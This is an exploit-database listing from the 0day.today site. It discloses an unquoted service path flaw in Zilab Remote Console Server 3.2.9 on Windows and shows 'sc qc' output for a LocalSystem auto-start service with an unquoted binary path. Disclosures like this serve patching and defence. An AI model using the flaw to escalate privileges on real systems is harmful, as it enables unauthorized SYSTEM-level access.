[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zilab Remote Console Server 3.2.9 - (zrcs) Unquoted Service Path Vulnerability

Author
cakes
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-33381
Category
local exploits
Date add
16-10-2019
Platform
windows
# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path
# Exploit Author : Cakes
# Vendor: Zilab Software Inc
# Version : Zilab Remote Console Server 3.2.9
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support
# Tested on Windows 10
# CVE : N/A 


C:\Users\Administrator>sc qc zrcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: zrcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Zilab Remote Console Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

#  0day.today [2024-09-28]  #